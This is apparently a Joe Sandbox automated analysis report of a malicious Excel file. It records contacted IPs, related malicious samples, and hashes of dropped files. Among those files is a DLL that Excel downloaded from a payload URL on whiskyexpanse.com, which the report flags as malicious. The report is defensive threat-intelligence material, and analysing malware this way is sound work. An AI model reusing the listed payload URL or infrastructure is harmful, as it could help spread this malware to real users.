                                                  http://www.ancert.com/cps0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ca.sia.it/seccli/repository/CRL.der0Jrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.registradores.org/scr/normativa/cp_f2.htm0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                    		high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    52.12.4.186
                                                    		unknownUnited States
                                                    		16509AMAZON-02UStrue
                                                    104.21.3.47
                                                    		whiskyexpanse.comUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:383422
                                                    Start date:07.04.2021
                                                    Start time:18:46:21
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 7m 43s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:Documents_460000622_1464906353.xls
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.expl.evad.winXLS@7/12@1/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 21.2% (good quality ratio 19.9%)
                                                    • Quality average: 76.5%
                                                    • Quality standard deviation: 30.3%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 67
                                                    • Number of non-executed functions: 144
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .xls
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, WerFault.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 8.253.207.121, 8.241.83.126, 8.241.89.254, 8.238.85.126, 8.238.85.254, 23.0.174.193, 23.0.174.185, 23.0.174.187
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    18:47:17API Interceptor26x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUSvniSIKfm4h.dllGet hashmaliciousBrowse
                                                    • 104.20.184.68
                                                    61mwzdX4GC.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    WbQrxxnmAO.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    msals.pumpl.dllGet hashmaliciousBrowse
                                                    • 104.20.184.68
                                                    234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    items list.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    Nickha #U0421#U0430ll Notification.mp3.htmGet hashmaliciousBrowse
                                                    • 172.67.156.94
                                                    SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    SecuriteInfo.com.Malware.AI.4002960471.16400.exeGet hashmaliciousBrowse
                                                    • 104.22.18.188
                                                    aunobp.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    StolenImages_Evidence.jsGet hashmaliciousBrowse
                                                    • 172.67.193.97
                                                    Inquiry 040721_pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.35.249
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Invoice copyt2.ppsGet hashmaliciousBrowse
                                                    • 172.67.178.43
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.35.175
                                                    shipping documents.exeGet hashmaliciousBrowse
                                                    • 172.67.161.182
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.35.175
                                                    EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    46578-TR.exeGet hashmaliciousBrowse
                                                    • 172.67.160.218
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    AMAZON-02UScomprobante de pago bancario.exeGet hashmaliciousBrowse
                                                    • 44.227.76.166
                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                    • 3.13.255.157
                                                    shipping documents.exeGet hashmaliciousBrowse
                                                    • 3.14.206.30
                                                    Export Invoices_&Packing List.exeGet hashmaliciousBrowse
                                                    • 65.1.51.136
                                                    U49nsX8zQr.exeGet hashmaliciousBrowse
                                                    • 3.142.167.54
                                                    LGKacQbjeH.exeGet hashmaliciousBrowse
                                                    • 3.22.15.135
                                                    GvqwXsjgUm.apkGet hashmaliciousBrowse
                                                    • 65.9.73.55
                                                    GvqwXsjgUm.apkGet hashmaliciousBrowse
                                                    • 65.9.73.104
                                                    payment.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    BL836477488575.exeGet hashmaliciousBrowse
                                                    • 3.13.255.157
                                                    SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                    • 34.240.216.169
                                                    taiwan.exeGet hashmaliciousBrowse
                                                    • 13.230.203.251
                                                    Order.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    BL84995005038483.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    Certrificate Confirmation.exeGet hashmaliciousBrowse
                                                    • 3.14.206.30
                                                    PO91361.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                    • 44.227.76.166
                                                    FARASIS.xlsxGet hashmaliciousBrowse
                                                    • 52.218.57.50
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 143.204.3.74
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 143.204.3.74

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    7dcce5b76c8b17472d024758970a406b8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copyt2.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Notice-039539.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1245492889.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Notice-039539.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    FARASIS.xlsxGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    NEW LEMA PO 652872-21.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1055791644.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    final po PP-11164.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    OrderSheet.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1848152474.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    eb88d0b3e1961a0562f006e5ce2a0b87document-1774544026.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_Receipt 8723_xls.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_Receipt 5576.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 1726.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    invoice.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Doc_841213_7440493012242.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    sample20210331-01.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 4153.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Q60T94coCp.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 6364.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Purchase_Order 1440.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    document-1223674862.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    document-585033175.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt_0624.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    SecuriteInfo.com.Heur.21995.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_receipt_639498456-001.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    sample20210324-01.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_077117.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_112488.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_655533.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):326
                                                    Entropy (8bit):3.11466556781601
                                                    Encrypted:false
                                                    SSDEEP:6:kKPllkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:HMwTJrkPlE99SNxAhUe0ht
                                                    MD5:DAE73406F57ACCA13A6BCA741457638D
                                                    SHA1:92EDB28B1A2B8774BB853F3A51BB2E84D1943EDE
                                                    SHA-256:09A4D2C168D63F22CD3514838B2E8F034DB2B2D3F3EBA013789AAAC0AA35F9F8
                                                    SHA-512:A39B85375E1314F9827E3499528C2DF36C73AE6D181CCA529E0CC69C50481CC0848DEC4FD13F07663DAED2A916A23663A460241970DDA07A8BC3529B1A66A4CE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: p...... ..........6:.,..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Reputation:low
                                                    IE Cache URL:https://whiskyexpanse.com/ke/ohior.dll
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\B3EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):82208
                                                    Entropy (8bit):7.883359597711546
                                                    Encrypted:false
                                                    SSDEEP:1536:yaC1JJ7BoQHbAr6AeW1eYbWZwHYvTS1Ru0qyCfQijWGHpM1Q:yaCnJqr6cbWZw4bSjveQijW2pM1Q
                                                    MD5:6932B145DDB6922457DA77263FD1754E
                                                    SHA1:3D8AB07403F7EDB6B309C13D7F87B2DBB4B58C01
                                                    SHA-256:48910B4E3DDAAE28D6C18E6F812D95019A41B7F3FF6D5336FA2CB96F04849670
                                                    SHA-512:AE33AB7EB2727286E24E77760F41CC52C8496366E1101368CE34A568C6589033C183711595E66F67CC2AA759E266386B44592287E35DC0178482F9A73A109E71
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: .U]O.0.}.....uJ\....)..{.$....Mb._....~.N. *M#.K>.{.=v....V... ...Y. ..n.4mM....?H."3.)k.&[..r....~. ..6.&]..'..w.Y....3...E|.-u.oX..|.....&.1. ..oh...U...gZR...KT5.:..8=.XK3B0..,bk.....6.. ,..(........ZU.K... F.".....q.*.2....A..hB.........t.....C.y..k......K..-..it...>[.Y[....Iv.PB.AU.J3..ak.8.yQx.)#....(.n..+.:.'td.s..{...Ks~B..@....D......-.../..pB/s..Pt..c..].@h?]....:.g.I..=|..].c........a../...B.}v.J.=#f.|.Q.C:P....4.`.........PK..........!.!..A............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\CabD146.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\Local\Temp\TarD147.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):152788
                                                    Entropy (8bit):6.309740459389463
                                                    Encrypted:false
                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=8192, window=hide
                                                    Category:dropped
                                                    Size (bytes):867
                                                    Entropy (8bit):4.474905640580116
                                                    Encrypted:false
                                                    SSDEEP:12:85QPLgXg/XAlCPCHaXtB8XzB/pUX+WnicvbCbDtZ3YilMMEpxRljKvUTdJP9TdJ2:85Y/XTd6jYYeyDv3qdrNru/
                                                    MD5:951A0E0CB8606EEF33219F64F47BDA04
                                                    SHA1:99E33BDC3EFDFD8E507BACC21FD736459F072583
                                                    SHA-256:F7B98730EF7D1FA92877BF3343D3031272AC398E2351DC23A28918D1A671C159
                                                    SHA-512:0AE4233FE581EB8F4D1EF632BB8A4CAD166FFB65B47889F796C6EFA92168037DEADB08AAD6D82AA0DC5861E186AEE620B9990758E515D89FEF8674F215F1D588
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F...........7G..+.1..,..+.1..,... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_460000622_1464906353.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=115712, window=hide
                                                    Category:dropped
                                                    Size (bytes):2228
                                                    Entropy (8bit):4.516452407405915
                                                    Encrypted:false
                                                    SSDEEP:48:8v/XT0jFQaP1d+8dQh2v/XT0jFQaP1d+8dQ/:8v/XojFQUThdQh2v/XojFQUThdQ/
                                                    MD5:90FB6C5F59725EA0D24D18D091040BBC
                                                    SHA1:004673E5C653BADB46406B4C5D5DD246614A8D0A
                                                    SHA-256:AECEB49FB09A71238F3153457F683A2821D5B598F3000C3B04B0287125B1A6E5
                                                    SHA-512:68D91C78D7848FD7ACF3CD96FE82D6CC7141D5BF0369FE7597AFDB5B2215FFF22B8B7167AC66ECCEBC009F7D30FCE26DA811D6C2B455B4D7DC42E2288D397CEA
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F.... ....M...{..+.1..,...p=..,...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..t...R.. .DOCUME~1.XLS..r.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\Documents_460000622_1464906353.xls.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):143
                                                    Entropy (8bit):4.652162523364624
                                                    Encrypted:false
                                                    SSDEEP:3:oyBVomMU9RTDXvbkTGXC5S/9RTDXvbkTGXCmMU9RTDXvbkTGXCv:dj6C1n7ASl1n7UC1n7s
                                                    MD5:A5C1694C63A4C40F758FAC46C375CFC4
                                                    SHA1:09CDCEEAAD5508225FFACCD2F7C99CEC1A5E85EB
                                                    SHA-256:21350610F2A79F94FC49E80087B5F2105A57A71DD2781532E08CB037A1D20D09
                                                    SHA-512:22A7F91BA27C4C46483F134973FE8D2E2607A634AA8C688C3BD9C04C3089744D8F161268214A7F0057AABDB310194C7A18664B1A293E68D907E119BBDED906C0
                                                    Malicious:false
                                                    Preview: Desktop.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..Documents_460000622_1464906353.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4MFCXH41.txt
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):118
                                                    Entropy (8bit):4.5708003640240715
                                                    Encrypted:false
                                                    SSDEEP:3:GmM/OeByDE11R1UTpI96OcAdV1uGTKvcSNzivVddw9QzS5/:XM/w8qTpQd2GTlLVddAoS5/
                                                    MD5:F081DDF03B7C946C0CC4C88EE9401E65
                                                    SHA1:E484164F0407597634D03904FBE7196F0E8308EB
                                                    SHA-256:AA4FF36CF14812E6C35F2C5BC766F2B43C6AE93008B622CAD49E72B617300023
                                                    SHA-512:2084C0A9BECFD190009DA633239F7FFBF1B3A031AF40C353B7E081D0C6EBC119BA4A510A073F52B76664C5908E3BBE4FC59212D0FC43392BCC5389F27406F8D0
                                                    Malicious:false
                                                    IE Cache URL:whiskyexpanse.com/
                                                    Preview: __cfduid.d12fd379ff8b296fa7718ea14c16458e21617814039.whiskyexpanse.com/.9728.2763359616.30884704.132854913.30878745.*.
                                                    C:\Users\user\Desktop\54EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Applesoft BASIC program data, first line number 16
                                                    Category:dropped
